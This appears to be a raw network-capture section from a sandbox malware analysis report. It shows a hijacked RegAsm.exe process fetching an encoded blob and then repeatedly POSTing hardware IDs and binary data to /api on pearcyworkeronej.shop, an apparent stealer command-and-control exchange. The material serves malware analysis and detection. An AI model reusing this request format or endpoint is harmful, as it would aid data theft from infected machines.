          2024-05-04 20:22:50 UTC561INData Raw: 33 64 62 34 0d 0a 53 7a 61 2f 4e 55 56 4b 72 42 59 73 63 6f 32 74 77 75 59 51 54 38 4e 76 46 56 6a 31 65 68 2f 6a 41 6b 55 5a 54 63 79 72 73 78 55 77 50 4c 59 58 4d 32 69 57 4e 68 68 65 68 36 54 67 6c 58 56 74 2b 55 39 68 4b 6f 41 66 4d 2b 6b 4c 5a 33 67 70 37 70 47 54 63 79 70 61 7a 46 42 70 51 4b 55 30 51 51 71 76 6c 2b 4b 39 47 6b 61 34 5a 52 78 52 31 78 39 78 77 54 68 6c 4f 7a 71 70 79 64 5a 74 50 31 50 52 52 69 77 6c 77 6c 5a 42 46 2f 6e 4d 72 34 64 6a 4a 4f 30 47 65 6e 72 5a 63 42 62 71 49 43 42 6a 62 2f 61 4c 6b 56 67 75 51 74 35 34 4a 44 6e 48 4e 41 42 34 68 4b 54 67 67 32 52 74 2b 55 38 33 42 4e 63 4b 66 70 46 6a 4b 47 6f 52 37 70 48 49 53 57 6c 66 79 31 41 33 4b 39 68 2f 51 78 7a 2b 38 65 44 63 4a 6e 2f 7a 58 79 56 6f 69 46 67 56 36 6e 39 50 45
          Data Ascii: 3db4Sza/NUVKrBYsco2twuYQT8NvFVj1eh/jAkUZTcyrsxUwPLYXM2iWNhheh6TglXVt+U9hKoAfM+kLZ3gp7pGTcypazFBpQKU0QQqvl+K9Gka4ZRxR1x9xwThlOzqpydZtP1PRRiwlwlZBF/nMr4djJO0GenrZcBbqICBjb/aLkVguQt54JDnHNAB4hKTgg2Rt+U83BNcKfpFjKGoR7pHISWlfy1A3K9h/Qxz+8eDcJn/zXyVoiFgV6n9PE
          2024-05-04 20:22:50 UTC1369INData Raw: 6c 46 49 55 56 5a 79 37 41 64 55 4d 51 2f 63 65 72 6a 33 63 2f 71 67 52 36 4e 35 63 56 64 34 35 6a 4a 33 77 6c 70 4d 62 62 63 79 52 5a 32 31 63 6e 61 49 41 63 4a 58 75 76 79 4c 6a 45 4b 6d 2f 68 4c 6e 49 71 6b 42 52 72 77 31 70 6e 45 30 53 78 68 37 6f 31 61 7a 79 32 54 6b 39 44 70 54 52 4a 48 4b 2b 58 34 73 52 36 4b 4b 49 4f 66 44 57 55 45 48 61 54 59 44 56 39 49 71 76 62 31 33 49 6e 58 74 35 46 4c 53 62 49 64 30 63 62 35 73 71 6e 67 44 4a 6a 79 57 59 63 65 70 41 41 50 64 6b 69 5a 31 6f 69 70 63 58 62 59 43 6b 55 74 54 77 34 5a 71 59 66 56 33 69 45 70 4f 43 44 66 6d 33 35 54 7a 63 2b 6c 68 78 38 68 57 34 70 66 79 4f 6f 78 39 78 34 4c 31 37 64 55 43 30 67 78 6e 56 44 47 2b 44 50 70 59 6c 32 4b 36 30 4d 63 6e 72 5a 63 42 62 71 49 43 42 6a 62 2f 61 4c 6b 56
          Data Ascii: lFIUVZy7AdUMQ/cerj3c/qgR6N5cVd45jJ3wlpMbbcyRZ21cnaIAcJXuvyLjEKm/hLnIqkBRrw1pnE0Sxh7o1azy2Tk9DpTRJHK+X4sR6KKIOfDWUEHaTYDV9Iqvb13InXt5FLSbId0cb5sqngDJjyWYcepAAPdkiZ1oipcXbYCkUtTw4ZqYfV3iEpOCDfm35Tzc+lhx8hW4pfyOox9x4L17dUC0gxnVDG+DPpYl2K60McnrZcBbqICBjb/aLkV
          2024-05-04 20:22:50 UTC1369INData Raw: 57 79 59 36 79 58 31 48 47 75 37 42 72 34 39 2b 4b 4c 4d 47 65 44 4b 59 47 58 43 4d 61 79 4e 37 62 2b 43 68 75 68 78 70 55 38 55 58 66 32 71 4f 56 55 4d 66 2f 63 79 78 78 6b 63 75 72 77 4e 77 4c 4e 64 77 46 70 34 75 54 78 41 32 78 71 4b 36 4e 79 35 59 6e 51 39 6c 61 4d 39 34 51 68 48 67 79 61 71 4d 63 53 79 7a 42 48 67 79 6d 42 46 38 67 6d 51 6d 63 54 32 38 79 64 31 6c 4a 56 37 62 57 43 6f 6b 6a 6a 6f 6d 65 34 53 50 70 35 77 79 64 65 4e 4e 58 54 6d 44 47 33 66 44 56 53 52 31 49 61 6e 66 6b 52 39 43 53 35 4d 2f 54 44 47 6d 48 79 56 51 36 4d 50 67 33 44 42 74 72 41 78 2f 50 49 55 58 63 49 4a 75 4b 58 51 71 6f 63 48 52 64 79 52 52 32 56 77 73 4b 38 4e 77 58 42 72 76 78 36 57 46 65 43 66 68 51 78 39 52 2f 46 68 36 6d 53 42 2f 4f 57 2b 66 33 74 6f 31 48 46 66
          Data Ascii: WyY6yX1HGu7Br49+KLMGeDKYGXCMayN7b+ChuhxpU8UXf2qOVUMf/cyxxkcurwNwLNdwFp4uTxA2xqK6Ny5YnQ9laM94QhHgyaqMcSyzBHgymBF8gmQmcT28yd1lJV7bWCokjjome4SPp5wydeNNXTmDG3fDVSR1IanfkR9CS5M/TDGmHyVQ6MPg3DBtrAx/PIUXcIJuKXQqocHRdyRR2VwsK8NwXBrvx6WFeCfhQx9R/Fh6mSB/OW+f3to1HFf
          2024-05-04 20:22:50 UTC1369INData Raw: 38 68 78 51 78 66 6b 7a 4c 4b 57 63 53 6d 76 41 54 64 30 2f 33 4d 57 77 57 63 2f 4f 33 66 73 69 66 52 67 4b 6b 54 62 56 47 64 41 70 57 73 41 65 49 54 57 79 4f 38 5a 62 61 59 42 4e 32 4c 56 57 48 32 50 62 43 78 38 4a 4b 58 4e 31 58 63 6b 58 39 4e 5a 4c 69 54 47 65 45 6b 43 34 73 71 6f 6a 6e 73 6f 72 51 42 30 4b 4a 51 5a 50 63 38 49 54 42 42 76 71 64 47 52 4c 32 73 55 2b 6d 51 51 43 34 34 63 4a 51 2b 68 70 38 75 64 47 6b 62 4b 54 58 41 32 31 30 41 2f 77 57 45 76 66 43 47 71 32 39 39 6c 4a 31 50 64 55 53 38 67 79 58 68 41 48 76 33 48 6f 59 52 38 49 71 6b 45 63 7a 75 54 48 48 47 47 49 47 6b 54 52 4d 57 4a 31 6d 39 70 44 4a 38 58 44 79 76 55 62 67 77 2b 35 4d 2b 6e 6c 47 51 32 34 57 55 63 4a 64 6c 77 46 70 67 49 54 42 42 76 71 63 57 52 4c 32 73 55 32 56 77 74
          Data Ascii: 8hxQxfkzLKWcSmvATd0/3MWwWc/O3fsifRgKkTbVGdApWsAeITWyO8ZbaYBN2LVWH2PbCx8JKXN1XckX9NZLiTGeEkC4sqojnsorQB0KJQZPc8ITBBvqdGRL2sU+mQQC44cJQ+hp8udGkbKTXA210A/wWEvfCGq299lJ1PdUS8gyXhAHv3HoYR8IqkEczuTHHGGIGkTRMWJ1m9pDJ8XDyvUbgw+5M+nlGQ24WUcJdlwFpgITBBvqcWRL2sU2Vwt
          2024-05-04 20:22:50 UTC1369INData Raw: 55 54 35 63 61 6a 69 48 51 73 72 77 31 35 4f 74 64 57 46 65 6f 4c 5a 33 77 33 37 70 47 54 4e 77 6c 66 79 30 49 6b 4f 4d 68 7a 51 6c 43 48 70 4c 2f 4b 47 6b 61 34 5a 52 78 52 31 78 39 78 77 54 68 6c 4f 79 47 38 7a 64 42 33 49 56 33 52 58 43 38 36 79 58 4e 46 48 75 48 45 70 49 68 37 4a 71 67 49 65 7a 75 63 45 58 69 46 61 69 46 32 62 2b 43 68 75 68 78 70 55 38 55 58 66 32 71 4f 57 45 30 66 35 49 2f 49 37 32 31 6a 79 57 5a 75 55 76 78 7a 50 59 5a 73 5a 79 4e 74 37 73 37 5a 66 79 64 58 32 31 77 72 4a 4d 39 39 53 42 58 6e 79 4b 2b 44 65 79 71 68 43 32 55 39 6d 68 46 39 69 6d 6b 74 66 79 36 6c 69 5a 38 66 51 6a 2b 64 55 44 39 6f 6c 6a 59 4f 49 75 6a 5a 73 49 63 79 52 63 6f 53 4f 56 48 2f 63 32 54 70 43 30 77 37 4b 4b 4b 4a 69 54 56 70 57 63 39 57 49 6a 72 4b 65
          Data Ascii: UT5cajiHQsrw15OtdWFeoLZ3w37pGTNwlfy0IkOMhzQlCHpL/KGka4ZRxR1x9xwThlOyG8zdB3IV3RXC86yXNFHuHEpIh7JqgIezucEXiFaiF2b+ChuhxpU8UXf2qOWE0f5I/I721jyWZuUvxzPYZsZyNt7s7ZfydX21wrJM99SBXnyK+DeyqhC2U9mhF9imktfy6liZ8fQj+dUD9oljYOIujZsIcyRcoSOVH/c2TpC0w7KKKJiTVpWc9WIjrKe
          2024-05-04 20:22:50 UTC1369INData Raw: 44 72 34 64 39 4c 71 49 4d 66 53 69 46 46 48 53 4a 5a 53 74 77 49 61 6a 62 31 33 67 67 56 39 35 65 49 43 44 43 66 6b 30 58 72 34 48 49 37 78 6c 74 70 68 55 33 59 74 56 59 58 70 5a 77 4b 6a 74 48 78 64 61 66 48 30 4a 4e 74 54 78 4d 61 4d 6c 34 44 6b 69 74 6a 36 69 4a 65 69 65 6c 43 6e 6f 39 6b 52 46 76 69 47 55 70 65 79 75 6c 78 74 64 7a 4b 6c 54 50 55 53 4d 67 7a 58 6c 44 48 75 7a 4c 34 4d 6f 61 52 73 70 4e 63 43 4c 58 51 44 2f 42 55 69 70 31 4e 4b 48 4f 77 48 31 70 50 4c 5a 49 61 55 43 6c 62 53 5a 37 68 49 2b 6e 69 44 4a 31 34 30 31 7a 4e 49 55 54 66 49 70 72 4b 58 77 67 71 38 50 52 65 43 31 58 30 31 77 6d 4b 38 5a 35 51 78 37 6c 78 71 6d 44 66 69 6d 6d 54 54 6c 53 2f 48 4d 39 68 6e 68 6e 49 32 33 75 34 76 42 61 42 56 50 48 46 30 39 44 30 54 6f 6d 65 2f
          Data Ascii: Dr4d9LqIMfSiFFHSJZStwIajb13ggV95eICDCfk0Xr4HI7xltphU3YtVYXpZwKjtHxdafH0JNtTxMaMl4Dkitj6iJeielCno9kRFviGUpeyulxtdzKlTPUSMgzXlDHuzL4MoaRspNcCLXQD/BUip1NKHOwH1pPLZIaUClbSZ7hI+niDJ1401zNIUTfIprKXwgq8PReC1X01wmK8Z5Qx7lxqmDfimmTTlS/HM9hnhnI23u4vBaBVPHF09D0Tome/
          2024-05-04 20:22:50 UTC1369INData Raw: 63 54 75 73 48 54 64 53 2f 41 63 7a 36 51 73 2b 45 30 54 46 69 64 5a 37 61 51 79 66 46 79 45 68 79 48 4e 49 48 76 33 4b 70 6f 74 39 4a 4b 67 4a 66 7a 6d 58 48 48 6d 47 5a 53 52 33 4a 4b 6e 4b 33 6e 4d 67 57 74 52 59 5a 32 61 6d 48 79 56 51 36 4e 66 67 33 44 42 74 67 42 5a 30 4e 70 70 59 46 65 70 2f 61 52 4e 45 74 36 47 36 48 47 6c 54 30 52 64 2f 61 6f 35 34 51 42 58 76 78 61 61 41 64 79 75 72 43 48 63 78 6c 42 64 35 68 32 51 6f 65 79 53 6e 79 4e 64 79 49 31 2f 62 57 69 51 75 79 44 51 41 65 49 53 6b 34 49 4e 71 62 66 6c 50 4e 78 71 4d 46 58 47 47 49 45 38 51 4d 4f 43 68 75 6d 35 42 50 37 59 58 49 43 53 4f 4c 41 78 51 35 4d 4f 6b 67 33 49 67 6f 67 56 79 50 70 30 64 66 59 6c 79 4c 33 73 6f 76 4e 76 52 66 69 78 59 33 6c 63 6a 4c 73 64 79 54 52 53 76 67 63 6a
          Data Ascii: cTusHTdS/Acz6Qs+E0TFidZ7aQyfFyEhyHNIHv3Kpot9JKgJfzmXHHmGZSR3JKnK3nMgWtRYZ2amHyVQ6Nfg3DBtgBZ0NppYFep/aRNEt6G6HGlT0Rd/ao54QBXvxaaAdyurCHcxlBd5h2QoeySnyNdyI1/bWiQuyDQAeISk4INqbflPNxqMFXGGIE8QMOChum5BP7YXICSOLAxQ5MOkg3IgogVyPp0dfYlyL3sovNvRfixY3lcjLsdyTRSvgcj
          2024-05-04 20:22:50 UTC1369INData Raw: 52 55 33 59 74 56 59 53 49 4a 75 4b 58 77 35 76 34 54 32 65 53 35 56 79 30 63 77 4a 34 34 36 4a 6e 75 45 6a 36 62 45 4b 6d 2f 79 51 78 39 52 2f 46 68 35 6b 43 42 2f 4f 58 2f 38 6b 6f 51 6b 66 67 53 50 50 30 77 33 67 42 77 6c 43 59 65 6b 79 38 52 6b 62 66 6c 50 4a 58 54 2f 63 78 62 42 63 6d 63 6a 62 65 36 4f 30 6d 55 37 55 74 35 42 4a 47 2f 77 53 6d 6b 47 35 63 69 77 67 32 55 69 34 55 4d 66 55 66 78 59 63 73 45 34 5a 55 4a 48 78 61 4b 36 4e 79 42 54 78 6b 59 78 4a 64 35 7a 44 6e 69 45 70 4a 2f 4b 47 6b 62 4b 54 57 39 36 7a 31 6f 39 74 47 4d 70 64 53 69 34 32 4a 78 51 50 31 37 61 52 79 41 2f 77 54 51 41 65 49 53 6b 34 49 49 79 64 65 4e 65 4f 56 4c 38 63 7a 32 46 63 57 63 6a 62 66 36 62 69 69 4a 36 41 34 30 46 54 30 50 52 4f 69 5a 37 39 71 66 4c 37 7a 49 37
          Data Ascii: RU3YtVYSIJuKXw5v4T2eS5Vy0cwJ446JnuEj6bEKm/yQx9R/Fh5kCB/OX/8koQkfgSPP0w3gBwlCYeky8RkbflPJXT/cxbBcmcjbe6O0mU7Ut5BJG/wSmkG5ciwg2Ui4UMfUfxYcsE4ZUJHxaK6NyBTxkYxJd5zDniEpJ/KGkbKTW96z1o9tGMpdSi42JxQP17aRyA/wTQAeISk4IIydeNeOVL8cz2FcWcjbf6biiJ6A40FT0PROiZ79qfL7zI7
          2024-05-04 20:22:50 UTC1369INData Raw: 69 75 57 48 36 54 63 6d 68 71 4f 61 50 5a 31 6a 73 68 52 64 42 62 5a 32 61 4d 4e 41 49 55 35 4d 4f 6c 67 32 4a 69 73 78 31 38 4e 6f 46 55 65 5a 4d 67 61 54 6c 76 76 38 4c 65 5a 53 64 54 6b 6b 59 78 4a 64 35 33 53 78 65 6a 78 37 47 4a 66 6d 33 76 54 7a 63 76 6e 42 52 37 6a 48 56 6f 61 6a 6d 74 33 39 59 37 49 55 58 51 57 32 63 58 67 42 77 6c 65 36 2f 58 34 4e 77 77 62 5a 51 4f 65 54 53 51 44 6d 7a 4d 51 43 78 33 4c 4b 4c 49 31 6a 64 6e 50 4c 59 38 5a 79 36 4f 4c 41 78 44 6f 61 66 4c 37 7a 49 70 73 45 30 76 65 4d 64 4b 4a 74 51 7a 63 43 74 39 78 71 4c 4f 4f 55 45 2f 78 44 39 4d 51 34 35 69 44 6b 69 74 6e 65 37 73 47 55 62 68 48 7a 64 69 31 56 67 36 67 6e 49 31 66 53 79 34 79 70 5a 4a 46 31 58 51 57 47 73 6d 78 58 52 4a 41 50 6e 55 37 49 78 78 4e 37 73 7a 53
          Data Ascii: iuWH6TcmhqOaPZ1jshRdBbZ2aMNAIU5MOlg2Jisx18NoFUeZMgaTlvv8LeZSdTkkYxJd53Sxejx7GJfm3vTzcvnBR7jHVoajmt39Y7IUXQW2cXgBwle6/X4NwwbZQOeTSQDmzMQCx3LKLI1jdnPLY8Zy6OLAxDoafL7zIpsE0veMdKJtQzcCt9xqLOOUE/xD9MQ45iDkitne7sGUbhHzdi1Vg6gnI1fSy4ypZJF1XQWGsmxXRJAPnU7IxxN7szS


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.449732172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:51 UTC287OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 18158
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:51 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 30 46 39 38 44 38 34 30 38 43 46 43 34 42 36 38 33 36 35 32 34 41 30 41 35 30 32 38 30 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 75 59 59 33 4e 49 2d 2d 0d 0a 2d 2d 62
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"960F98D8408CFC4B6836524A0A502805--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"uYY3NI----b
          2024-05-04 20:22:51 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
          Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
          2024-05-04 20:22:52 UTC808INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:52 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=9b63ukk68kr924d3q4k5r3nrt5; expires=Wed, 28-Aug-2024 14:09:30 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCuZM%2Frvuu6vN2Y0HtOB4MHjkkdSI10NJl%2BYjDUv48MmUjSeetfmxlMyoIeLzpYYq0iN5Cbqg5DBk0mxSG6GIXOjvpaASWKIrQ%2FoGD%2Bs04ZgSCW2jAuRJdbmu8yi8F1P2IQlbGBfunM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb348b99952af3-LAX
          alt-svc: h3=":443"; ma=86400
          2024-05-04 20:22:52 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 0d 0a
          Data Ascii: 10ok 81.181.54.104
          2024-05-04 20:22:52 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.449733172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:52 UTC286OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8779
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:52 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 30 46 39 38 44 38 34 30 38 43 46 43 34 42 36 38 33 36 35 32 34 41 30 41 35 30 32 38 30 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 75 59 59 33 4e 49 2d 2d 0d 0a 2d 2d 62
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"960F98D8408CFC4B6836524A0A502805--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"uYY3NI----b
          2024-05-04 20:22:53 UTC808INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:53 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=ncfrp3703ffmv36d57a6b88jb9; expires=Wed, 28-Aug-2024 14:09:32 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69kTtgJEUfmToFlsuT1XkMgU%2FKAuiw63MO9N7olzWxCYSzbpNCCNUOO2qksIxDho7G1Wytzna7JyacTDB%2BZOyLDxsLydGPsKGcisu07RoG9Se53op%2FQCx8CYCg6DMui9yd1Fsbs%2FBqA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb3493de850fb8-LAX
          alt-svc: h3=":443"; ma=86400
          2024-05-04 20:22:53 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 0d 0a
          Data Ascii: 10ok 81.181.54.104
          2024-05-04 20:22:53 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.449734172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:53 UTC287OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 20432
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:53 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 30 46 39 38 44 38 34 30 38 43 46 43 34 42 36 38 33 36 35 32 34 41 30 41 35 30 32 38 30 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 75 59 59 33 4e 49 2d 2d 0d 0a 2d 2d 62
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"960F98D8408CFC4B6836524A0A502805--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"uYY3NI----b
          2024-05-04 20:22:53 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
          Data Ascii: `M?lrQMn 64F6(X&7~`aO
          2024-05-04 20:22:54 UTC802INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:54 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=5p69u4jfs21tf67lo782tndmj1; expires=Wed, 28-Aug-2024 14:09:33 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBy9pRga39OQOuChKgkaTw1jYaxZIjCOEWZtWR4jWL2P1KI34P00Z5BvfnzZ0so1U88I075XJcG0ySh8VRvkidM9M6NUA1LpHP6%2FkobhWlS3Z4QsgCYYxH4ZtkL6JeYI0N7QF5K73Dg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb349b0fc10d48-LAX
          alt-svc: h3=":443"; ma=86400
          2024-05-04 20:22:54 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 0d 0a
          Data Ascii: 10ok 81.181.54.104
          2024-05-04 20:22:54 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.449735172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:56 UTC286OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 7079
          Host: pearcyworkeronej.shop
